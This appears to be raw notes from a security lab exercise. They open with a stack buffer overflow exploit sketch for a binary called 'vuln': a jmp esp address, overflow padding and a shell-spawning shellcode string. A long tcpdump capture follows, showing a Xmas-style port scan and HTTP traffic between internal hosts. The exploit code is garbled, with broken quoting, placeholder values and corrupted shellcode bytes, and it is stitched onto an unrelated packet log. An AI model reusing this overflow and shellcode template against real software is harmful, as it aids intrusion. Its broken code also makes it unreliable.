1disassemble with objdump, get the address of our jmp esp
20x80483f7
33 how much buffer can it handle
4
5./vuln 'python -c 'print "A"*1000''
6gdb r 'python -c 'print "A"*1000''+ "CCCC"'
7
8junk ="A" * {random}
9padding = "CCCC"
10jmpesp = "0x80483f7"
11shellcode = ""\x31\xc0\x31\xdb\xb0\x06\xcd\x80"
12"\x53\x68\tty\x68\dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80
13\x31\xc0\x50\x86//ssh\x86/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
14 (6), length 40)
15 ip-10-10-148-177.eu-west-1.compute.internal.50121 > ip-10-10-200-226.eu-west-1.compute.internal.20221: Flags [FPU], cksum 0x8898 (correct), seq 3180585248, win 1024, urg 0, length 0
1600:43:01.227616 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
17 ip-10-10-200-226.eu-west-1.compute.internal.20221 > ip-10-10-148-177.eu-west-1.compute.internal.50121: Flags [R.], cksum 0x8cac (correct), seq 0, ack 3180585249, win 0, length 0
1800:43:01.240956 IP (tos 0x0, ttl 64, id 24641, offset 0, flags [DF], proto TCP (6), length 68)
19 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x1a81 (correct), seq 10828:10844, ack 25919214, win 6347, options [nop,nop,TS val 3431983964 ecr 997087387], length 16: HTTP
2000:43:01.241094 IP (tos 0x0, ttl 64, id 24447, offset 0, flags [DF], proto TCP (6), length 52)
21 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x2ec6), seq 25919214, ack 10844, win 482, options [nop,nop,TS val 997087424 ecr 3431983964], length 0
2200:43:01.264574 IP (tos 0x0, ttl 64, id 24642, offset 0, flags [DF], proto TCP (6), length 68)
23 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0xc068 (correct), seq 10844:10860, ack 25919214, win 6347, options [nop,nop,TS val 3431983988 ecr 997087424], length 16: HTTP
2400:43:01.264692 IP (tos 0x0, ttl 64, id 24448, offset 0, flags [DF], proto TCP (6), length 52)
25 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x2e86), seq 25919214, ack 10860, win 482, options [nop,nop,TS val 997087448 ecr 3431983988], length 0
2600:43:01.277428 IP (tos 0x0, ttl 64, id 24449, offset 0, flags [DF], proto TCP (6), length 62695)
27 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0x0198), seq 25919214:25981857, ack 10860, win 482, options [nop,nop,TS val 997087461 ecr 3431983988], length 62643: HTTP
2800:43:01.277641 IP (tos 0x0, ttl 64, id 24456, offset 0, flags [DF], proto TCP (6), length 2896)
29 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0xc437), seq 25981857:25984701, ack 10860, win 482, options [nop,nop,TS val 997087461 ecr 3431983988], length 2844: HTTP
3000:43:01.277861 IP (tos 0x0, ttl 64, id 24643, offset 0, flags [DF], proto TCP (6), length 52)
31 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x2413 (correct), seq 10860, ack 25981857, win 6023, options [nop,nop,TS val 3431984001 ecr 997087461], length 0
3200:43:01.278729 IP (tos 0x0, ttl 64, id 24457, offset 0, flags [DF], proto TCP (6), length 49808)
33 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x6d6c (incorrect -> 0xdba3), seq 25984701:26034457, ack 10860, win 482, options [nop,nop,TS val 997087462 ecr 3431984001], length 49756: HTTP
3400:43:01.279044 IP (tos 0x0, ttl 64, id 24644, offset 0, flags [DF], proto TCP (6), length 52)
35 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x8c8d (correct), seq 10860, ack 26020497, win 6171, options [nop,nop,TS val 3431984002 ecr 997087461], length 0
3600:43:01.279178 IP (tos 0x0, ttl 64, id 24645, offset 0, flags [DF], proto TCP (6), length 52)
37 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x5654 (correct), seq 10860, ack 26034457, win 6091, options [nop,nop,TS val 3431984002 ecr 997087462], length 0
3800:43:01.300692 IP (tos 0x0, ttl 64, id 24646, offset 0, flags [DF], proto TCP (6), length 68)
39 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x162d (correct), seq 10860:10876, ack 26034457, win 6347, options [nop,nop,TS val 3431984024 ecr 997087462], length 16: HTTP
4000:43:01.307395 IP (tos 0x0, ttl 43, id 20042, offset 0, flags [none], proto TCP (6), length 40)
41 ip-10-10-148-177.eu-west-1.compute.internal.50122 > ip-10-10-200-226.eu-west-1.compute.internal.50800: Flags [FPU], cksum 0x1124 (correct), seq 3180519713, win 1024, urg 0, length 0
4200:43:01.307809 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
43 ip-10-10-200-226.eu-west-1.compute.internal.50800 > ip-10-10-148-177.eu-west-1.compute.internal.50122: Flags [R.], cksum 0x1538 (correct), seq 0, ack 3180519714, win 0, length 0
4400:43:01.340331 IP (tos 0x0, ttl 64, id 24463, offset 0, flags [DF], proto TCP (6), length 62695)
45 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0x8784), seq 26034457:26097100, ack 10876, win 482, options [nop,nop,TS val 997087524 ecr 3431984024], length 62643: HTTP
4600:43:01.340512 IP (tos 0x0, ttl 64, id 24470, offset 0, flags [DF], proto TCP (6), length 2896)
47 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0xe78e), seq 26097100:26099944, ack 10876, win 482, options [nop,nop,TS val 997087524 ecr 3431984024], length 2844: HTTP
4800:43:01.340700 IP (tos 0x0, ttl 64, id 24647, offset 0, flags [DF], proto TCP (6), length 52)
49 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x6158 (correct), seq 10876, ack 26097100, win 6023, options [nop,nop,TS val 3431984064 ecr 997087524], length 0
5000:43:01.341746 IP (tos 0x0, ttl 64, id 24471, offset 0, flags [DF], proto TCP (6), length 57493)
51 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x8b71 (incorrect -> 0xb438), seq 26099944:26157385, ack 10876, win 482, options [nop,nop,TS val 997087525 ecr 3431984064], length 57441: HTTP
5200:43:01.342068 IP (tos 0x0, ttl 64, id 24648, offset 0, flags [DF], proto TCP (6), length 52)
53 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x75b9 (correct), seq 10876, ack 26157385, win 6055, options [nop,nop,TS val 3431984065 ecr 997087524], length 0
5400:43:01.350522 IP (tos 0x0, ttl 64, id 24649, offset 0, flags [DF], proto TCP (6), length 68)
55 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0xcc87 (correct), seq 10876:10892, ack 26157385, win 6347, options [nop,nop,TS val 3431984074 ecr 997087524], length 16: HTTP
5600:43:01.387559 IP (tos 0x0, ttl 52, id 44283, offset 0, flags [none], proto TCP (6), length 40)
57 ip-10-10-148-177.eu-west-1.compute.internal.50121 > ip-10-10-200-226.eu-west-1.compute.internal.1069: Flags [FPU], cksum 0xd368 (correct), seq 3180585248, win 1024, urg 0, length 0
5800:43:01.388017 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
59 ip-10-10-200-226.eu-west-1.compute.internal.1069 > ip-10-10-148-177.eu-west-1.compute.internal.50121: Flags [R.], cksum 0xd77c (correct), seq 0, ack 3180585249, win 0, length 0
6000:43:01.391305 IP (tos 0x0, ttl 64, id 24478, offset 0, flags [DF], proto TCP (6), length 52)
61 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x8b32), seq 26157385, ack 10892, win 482, options [nop,nop,TS val 997087575 ecr 3431984074], length 0
6200:43:01.416224 IP (tos 0x0, ttl 64, id 24650, offset 0, flags [DF], proto TCP (6), length 68)
63 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x157a (correct), seq 10892:10908, ack 26157385, win 6347, options [nop,nop,TS val 3431984139 ecr 997087575], length 16: HTTP
6400:43:01.416392 IP (tos 0x0, ttl 64, id 24479, offset 0, flags [DF], proto TCP (6), length 52)
65 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x8ac8), seq 26157385, ack 10908, win 482, options [nop,nop,TS val 997087600 ecr 3431984139], length 0
6600:43:01.447462 IP (tos 0x0, ttl 64, id 24480, offset 0, flags [DF], proto TCP (6), length 62695)
67 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0x5330), seq 26157385:26220028, ack 10908, win 482, options [nop,nop,TS val 997087631 ecr 3431984139], length 62643: HTTP
6800:43:01.447640 IP (tos 0x0, ttl 64, id 24487, offset 0, flags [DF], proto TCP (6), length 2896)
69 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0x0eb5), seq 26220028:26222872, ack 10908, win 482, options [nop,nop,TS val 997087631 ecr 3431984139], length 2844: HTTP
7000:43:01.447812 IP (tos 0x0, ttl 64, id 24651, offset 0, flags [DF], proto TCP (6), length 52)
71 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x0b41 (correct), seq 10908, ack 26184232, win 6219, options [nop,nop,TS val 3431984171 ecr 997087631], length 0
7200:43:01.447832 IP (tos 0x0, ttl 64, id 24652, offset 0, flags [DF], proto TCP (6), length 52)
73 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x7524 (correct), seq 10908, ack 26222872, win 6007, options [nop,nop,TS val 3431984171 ecr 997087631], length 0
7400:43:01.448819 IP (tos 0x0, ttl 64, id 24488, offset 0, flags [DF], proto TCP (6), length 53862)
75 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x7d42 (incorrect -> 0x3270), seq 26222872:26276682, ack 10908, win 482, options [nop,nop,TS val 997087632 ecr 3431984171], length 53810: HTTP
7600:43:01.449091 IP (tos 0x0, ttl 64, id 24653, offset 0, flags [DF], proto TCP (6), length 52)
77 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x2e34 (correct), seq 10908, ack 26240770, win 6267, options [nop,nop,TS val 3431984172 ecr 997087632], length 0
7800:43:01.449118 IP (tos 0x0, ttl 64, id 24654, offset 0, flags [DF], proto TCP (6), length 52)
79 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0xa2b1 (correct), seq 10908, ack 26276682, win 6069, options [nop,nop,TS val 3431984172 ecr 997087632], length 0
8000:43:01.454009 IP (tos 0x0, ttl 64, id 24655, offset 0, flags [DF], proto TCP (6), length 68)
81 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x264c (correct), seq 10908:10924, ack 26276682, win 6347, options [nop,nop,TS val 3431984177 ecr 997087632], length 16: HTTP
8200:43:01.467754 IP (tos 0x0, ttl 41, id 34770, offset 0, flags [none], proto TCP (6), length 40)
83 ip-10-10-148-177.eu-west-1.compute.internal.50121 > ip-10-10-200-226.eu-west-1.compute.internal.2041: Flags [FPU], cksum 0xcf9c (correct), seq 3180585248, win 1024, urg 0, length 0
8400:43:01.468111 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
85 ip-10-10-200-226.eu-west-1.compute.internal.2041 > ip-10-10-148-177.eu-west-1.compute.internal.50121: Flags [R.], cksum 0xd3b0 (correct), seq 0, ack 3180585249, win 0, length 0
8600:43:01.492453 IP (tos 0x0, ttl 64, id 24656, offset 0, flags [DF], proto TCP (6), length 68)
87 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x9b2a (correct), seq 10924:10940, ack 26276682, win 6347, options [nop,nop,TS val 3431984216 ecr 997087632], length 16: HTTP
8800:43:01.492496 IP (tos 0x0, ttl 64, id 24495, offset 0, flags [DF], proto TCP (6), length 52)
89 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0xb833), seq 26276682, ack 10940, win 482, options [nop,nop,TS val 997087676 ecr 3431984177], length 0
9000:43:01.525524 IP (tos 0x0, ttl 64, id 24496, offset 0, flags [DF], proto TCP (6), length 62695)
91 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0xec98), seq 26276682:26339325, ack 10940, win 482, options [nop,nop,TS val 997087709 ecr 3431984177], length 62643: HTTP
9200:43:01.525721 IP (tos 0x0, ttl 64, id 24503, offset 0, flags [DF], proto TCP (6), length 2896)
93 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0xd146), seq 26339325:26342169, ack 10940, win 482, options [nop,nop,TS val 997087709 ecr 3431984177], length 2844: HTTP
9400:43:01.525900 IP (tos 0x0, ttl 64, id 24657, offset 0, flags [DF], proto TCP (6), length 52)
95 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0xad71 (correct), seq 10940, ack 26339325, win 6023, options [nop,nop,TS val 3431984249 ecr 997087709], length 0
9600:43:01.526608 IP (tos 0x0, ttl 64, id 24504, offset 0, flags [DF], proto TCP (6), length 49093)
97 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x6aa1 (incorrect -> 0x1828), seq 26342169:26391210, ack 10940, win 482, options [nop,nop,TS val 997087710 ecr 3431984249], length 49041: HTTP
9800:43:01.526937 IP (tos 0x0, ttl 64, id 24658, offset 0, flags [DF], proto TCP (6), length 52)
99 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0xf326 (correct), seq 10940, ack 26386914, win 6123, options [nop,nop,TS val 3431984250 ecr 997087709], length 0
10000:43:01.530054 IP (tos 0x0, ttl 64, id 24659, offset 0, flags [DF], proto TCP (6), length 68)
101 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x0e84 (correct), seq 10940:10956, ack 26391210, win 6347, options [nop,nop,TS val 3431984253 ecr 997087710], length 16: HTTP
10200:43:01.547948 IP (tos 0x0, ttl 53, id 48049, offset 0, flags [none], proto TCP (6), length 40)
103 ip-10-10-148-177.eu-west-1.compute.internal.50122 > ip-10-10-200-226.eu-west-1.compute.internal.1069: Flags [FPU], cksum 0xd367 (correct), seq 3180519713, win 1024, urg 0, length 0
10400:43:01.548349 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
105 ip-10-10-200-226.eu-west-1.compute.internal.1069 > ip-10-10-148-177.eu-west-1.compute.internal.50122: Flags [R.], cksum 0xd77b (correct), seq 0, ack 3180519714, win 0, length 0
10600:43:01.571378 IP (tos 0x0, ttl 64, id 24510, offset 0, flags [DF], proto TCP (6), length 52)
107 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0xf826), seq 26391210, ack 10956, win 482, options [nop,nop,TS val 997087755 ecr 3431984253], length 0
10800:43:01.588390 IP (tos 0x0, ttl 64, id 24660, offset 0, flags [DF], proto TCP (6), length 68)
109 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x5a42 (correct), seq 10956:10972, ack 26391210, win 6347, options [nop,nop,TS val 3431984311 ecr 997087755], length 16: HTTP
11000:43:01.588572 IP (tos 0x0, ttl 64, id 24511, offset 0, flags [DF], proto TCP (6), length 52)
111 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0xf7cb), seq 26391210, ack 10972, win 482, options [nop,nop,TS val 997087772 ecr 3431984311], length 0
11200:43:01.620113 IP (tos 0x0, ttl 64, id 24512, offset 0, flags [DF], proto TCP (6), length 62695)
113 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0x95ad), seq 26391210:26453853, ack 10972, win 482, options [nop,nop,TS val 997087803 ecr 3431984311], length 62643: HTTP
11400:43:01.620337 IP (tos 0x0, ttl 64, id 24519, offset 0, flags [DF], proto TCP (6), length 2896)
115 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0xb171), seq 26453853:26456697, ack 10972, win 482, options [nop,nop,TS val 997087804 ecr 3431984311], length 2844: HTTP
11600:43:01.620538 IP (tos 0x0, ttl 64, id 24661, offset 0, flags [DF], proto TCP (6), length 52)
117 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0xed32 (correct), seq 10972, ack 26453853, win 6023, options [nop,nop,TS val 3431984344 ecr 997087803], length 0
11800:43:01.621180 IP (tos 0x0, ttl 64, id 24520, offset 0, flags [DF], proto TCP (6), length 51025)
119 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x722d (incorrect -> 0x1091), seq 26456697:26507670, ack 10972, win 482, options [nop,nop,TS val 997087804 ecr 3431984344], length 50973: HTTP
12000:43:01.621638 IP (tos 0x0, ttl 64, id 24662, offset 0, flags [DF], proto TCP (6), length 52)
121 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0xbdfb (correct), seq 10972, ack 26465646, win 6315, options [nop,nop,TS val 3431984345 ecr 997087804], length 0
12200:43:01.621654 IP (tos 0x0, ttl 64, id 24663, offset 0, flags [DF], proto TCP (6), length 52)
123 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x1ab3 (correct), seq 10972, ack 26507670, win 6091, options [nop,nop,TS val 3431984345 ecr 997087804], length 0
12400:43:01.624279 IP (tos 0x0, ttl 64, id 24664, offset 0, flags [DF], proto TCP (6), length 68)
125 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x0234 (correct), seq 10972:10988, ack 26507670, win 6347, options [nop,nop,TS val 3431984347 ecr 997087804], length 16: HTTP
12600:43:01.628148 IP (tos 0x0, ttl 58, id 3834, offset 0, flags [none], proto TCP (6), length 40)
127 ip-10-10-148-177.eu-west-1.compute.internal.50121 > ip-10-10-200-226.eu-west-1.compute.internal.50002: Flags [FPU], cksum 0x1443 (correct), seq 3180585248, win 1024, urg 0, length 0
12800:43:01.628589 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
129 ip-10-10-200-226.eu-west-1.compute.internal.50002 > ip-10-10-148-177.eu-west-1.compute.internal.50121: Flags [R.], cksum 0x1857 (correct), seq 0, ack 3180585249, win 0, length 0
13000:43:01.667290 IP (tos 0x0, ttl 64, id 24526, offset 0, flags [DF], proto TCP (6), length 52)
131 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x305b), seq 26507670, ack 10988, win 482, options [nop,nop,TS val 997087851 ecr 3431984347], length 0
13200:43:01.673072 IP (tos 0x0, ttl 64, id 24665, offset 0, flags [DF], proto TCP (6), length 68)
133 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x80d0 (correct), seq 10988:11004, ack 26507670, win 6347, options [nop,nop,TS val 3431984396 ecr 997087851], length 16: HTTP
13400:43:01.673229 IP (tos 0x0, ttl 64, id 24527, offset 0, flags [DF], proto TCP (6), length 52)
135 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x3014), seq 26507670, ack 11004, win 482, options [nop,nop,TS val 997087857 ecr 3431984396], length 0
13600:43:01.693950 IP (tos 0x0, ttl 64, id 24528, offset 0, flags [DF], proto TCP (6), length 62695)
137 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0xa00a), seq 26507670:26570313, ack 11004, win 482, options [nop,nop,TS val 997087877 ecr 3431984396], length 62643: HTTP
13800:43:01.694174 IP (tos 0x0, ttl 64, id 24535, offset 0, flags [DF], proto TCP (6), length 2896)
139 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0xd4cf), seq 26570313:26573157, ack 11004, win 482, options [nop,nop,TS val 997087877 ecr 3431984396], length 2844: HTTP
14000:43:01.694314 IP (tos 0x0, ttl 64, id 24666, offset 0, flags [DF], proto TCP (6), length 52)
141 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0xd367 (correct), seq 11004, ack 26525568, win 6267, options [nop,nop,TS val 3431984417 ecr 997087877], length 0
14200:43:01.694357 IP (tos 0x0, ttl 64, id 24667, offset 0, flags [DF], proto TCP (6), length 52)
143 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x2592 (correct), seq 11004, ack 26570313, win 6023, options [nop,nop,TS val 3431984417 ecr 997087877], length 0
14400:43:01.695237 IP (tos 0x0, ttl 64, id 24536, offset 0, flags [DF], proto TCP (6), length 56372)
145 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x8710 (incorrect -> 0xb84e), seq 26573157:26629477, ack 11004, win 482, options [nop,nop,TS val 997087879 ecr 3431984417], length 56320: HTTP
14600:43:01.695565 IP (tos 0x0, ttl 64, id 24668, offset 0, flags [DF], proto TCP (6), length 52)
147 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0xd395 (correct), seq 11004, ack 26591055, win 6267, options [nop,nop,TS val 3431984419 ecr 997087877], length 0
14800:43:01.695663 IP (tos 0x0, ttl 64, id 24669, offset 0, flags [DF], proto TCP (6), length 52)
149 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x3e51 (correct), seq 11004, ack 26629477, win 6055, options [nop,nop,TS val 3431984419 ecr 997087879], length 0
15000:43:01.704028 IP (tos 0x0, ttl 64, id 24670, offset 0, flags [DF], proto TCP (6), length 68)
151 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x8f6b (correct), seq 11004:11020, ack 26629477, win 6347, options [nop,nop,TS val 3431984427 ecr 997087879], length 16: HTTP
15200:43:01.708350 IP (tos 0x0, ttl 44, id 26586, offset 0, flags [none], proto TCP (6), length 40)
153 ip-10-10-148-177.eu-west-1.compute.internal.50121 > ip-10-10-200-226.eu-west-1.compute.internal.3221: Flags [FPU], cksum 0xcb00 (correct), seq 3180585248, win 1024, urg 0, length 0
15400:43:01.708843 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
155 ip-10-10-200-226.eu-west-1.compute.internal.3221 > ip-10-10-148-177.eu-west-1.compute.internal.50121: Flags [R.], cksum 0xcf14 (correct), seq 0, ack 3180585249, win 0, length 0
15600:43:01.738530 IP (tos 0x0, ttl 64, id 24671, offset 0, flags [DF], proto TCP (6), length 70)
157 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x0d86 (correct), seq 11020:11038, ack 26629477, win 6347, options [nop,nop,TS val 3431984462 ecr 997087879], length 18: HTTP
15800:43:01.738578 IP (tos 0x0, ttl 64, id 24543, offset 0, flags [DF], proto TCP (6), length 52)
159 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x53c1), seq 26629477, ack 11038, win 482, options [nop,nop,TS val 997087922 ecr 3431984427], length 0
16000:43:01.763935 IP (tos 0x0, ttl 64, id 24672, offset 0, flags [DF], proto TCP (6), length 68)
161 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0xfe5e (correct), seq 11038:11054, ack 26629477, win 6347, options [nop,nop,TS val 3431984487 ecr 997087922], length 16: HTTP
16200:43:01.788549 IP (tos 0x0, ttl 50, id 61856, offset 0, flags [none], proto TCP (6), length 40)
163 ip-10-10-148-177.eu-west-1.compute.internal.50121 > ip-10-10-200-226.eu-west-1.compute.internal.5800: Flags [FPU], cksum 0xc0ed (correct), seq 3180585248, win 1024, urg 0, length 0
16400:43:01.789163 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
165 ip-10-10-200-226.eu-west-1.compute.internal.5800 > ip-10-10-148-177.eu-west-1.compute.internal.50121: Flags [R.], cksum 0xc501 (correct), seq 0, ack 3180585249, win 0, length 0
16600:43:01.798617 IP (tos 0x0, ttl 64, id 24673, offset 0, flags [DF], proto TCP (6), length 68)
167 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0xc159 (correct), seq 11054:11070, ack 26629477, win 6347, options [nop,nop,TS val 3431984522 ecr 997087922], length 16: HTTP
16800:43:01.798659 IP (tos 0x0, ttl 64, id 24544, offset 0, flags [DF], proto TCP (6), length 52)
169 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x5329), seq 26629477, ack 11070, win 482, options [nop,nop,TS val 997087982 ecr 3431984487], length 0
17000:43:01.806357 IP (tos 0x0, ttl 64, id 24545, offset 0, flags [DF], proto TCP (6), length 62695)
171 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0x4ffe), seq 26629477:26692120, ack 11070, win 482, options [nop,nop,TS val 997087990 ecr 3431984487], length 62643: HTTP
17200:43:01.806595 IP (tos 0x0, ttl 64, id 24552, offset 0, flags [DF], proto TCP (6), length 2896)
173 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0xfc4f), seq 26692120:26694964, ack 11070, win 482, options [nop,nop,TS val 997087990 ecr 3431984487], length 2844: HTTP
17400:43:01.806779 IP (tos 0x0, ttl 64, id 24674, offset 0, flags [DF], proto TCP (6), length 52)
175 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x48a1 (correct), seq 11070, ack 26692120, win 6019, options [nop,nop,TS val 3431984530 ecr 997087990], length 0
17600:43:01.808183 IP (tos 0x0, ttl 64, id 24553, offset 0, flags [DF], proto TCP (6), length 52618)
